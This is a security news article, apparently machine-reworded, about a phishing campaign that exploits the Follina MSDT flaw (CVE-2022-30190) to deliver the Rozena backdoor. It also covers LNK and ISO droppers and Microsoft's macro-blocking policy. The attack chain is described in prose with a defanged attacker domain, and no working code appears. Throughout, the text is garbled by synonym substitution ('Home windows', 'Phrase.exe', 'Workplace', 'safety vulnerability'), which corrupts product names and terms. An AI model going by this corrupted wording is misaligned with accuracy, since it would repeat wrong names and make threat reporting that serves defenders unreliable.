A newly noticed phishing marketing campaign is leveraging the just lately disclosed Follina safety vulnerability to distribute a beforehand undocumented backdoor on Home windows programs.
“Rozena is a backdoor malware that’s able to injecting a distant shell connection again to the attacker’s machine,” Fortinet FortiGuard Labs researcher Cara Lin mentioned in a report this week.
Tracked as CVE-2022-30190, the now-patched Microsoft Home windows Assist Diagnostic Device (MSDT) distant code execution vulnerability has come beneath heavy exploitation in latest weeks ever because it got here to gentle in late Might 2022.
The place to begin for the newest assault chain noticed by Fortinet is a weaponized Workplace doc that, when opened, connects to a Discord CDN URL to retrieve an HTML file (“index.htm“) that, in flip, invokes the diagnostic utility utilizing a PowerShell command to obtain next-stage payloads from the identical CDN attachment area.
This consists of the Rozena implant (“Phrase.exe”) and a batch file (“cd.bat”) that is designed to terminate MSDT processes, set up the backdoor’s persistence by the use of Home windows Registry modification, and obtain a innocent Phrase doc as a decoy.
The malware’s core perform is to inject shellcode that launches a reverse shell to the attacker’s host (“microsofto.duckdns[.]org”), finally permitting the attacker to take management of the system required to observe and seize data, whereas additionally sustaining a backdoor to the compromised system.
The exploitation of the Follina flaw to distribute malware via malicious Phrase paperwork comes as social engineering assaults relying on Microsoft Excel, Home windows shortcut (LNK), and ISO picture recordsdata as droppers to deploy malware corresponding to Emotet, QBot, IcedID, and Bumblebee to a sufferer’s gadget.
The droppers are mentioned to be distributed via emails that include straight the dropper or a password-protected ZIP as an attachment, an HTML file that extracts the dropper when opened, or a hyperlink to obtain the dropper within the physique of the e-mail.
Whereas assaults noticed in early April prominently featured Excel recordsdata with XLM macros, Microsoft’s choice to dam macros by default across the similar time is claimed to have compelled the risk actors to pivot to different strategies like HTML smuggling in addition to .LNK and .ISO recordsdata.
Final month, Cyble disclosed particulars of a malware software referred to as Quantum that is being offered on underground boards in order to equip cybercriminal actors with capabilities to construct malicious .LNK and .ISO recordsdata.
It is price noting that macros have been a tried-and-tested assault vector for adversaries trying to drop ransomware and different malware on Home windows programs, whether or not it’s via phishing emails or different means.
Microsoft has since quickly paused its plans to disable Workplace macros in recordsdata downloaded from the web, with the corporate telling The Hacker Information that it is taking the time to make “further modifications to boost usability.”
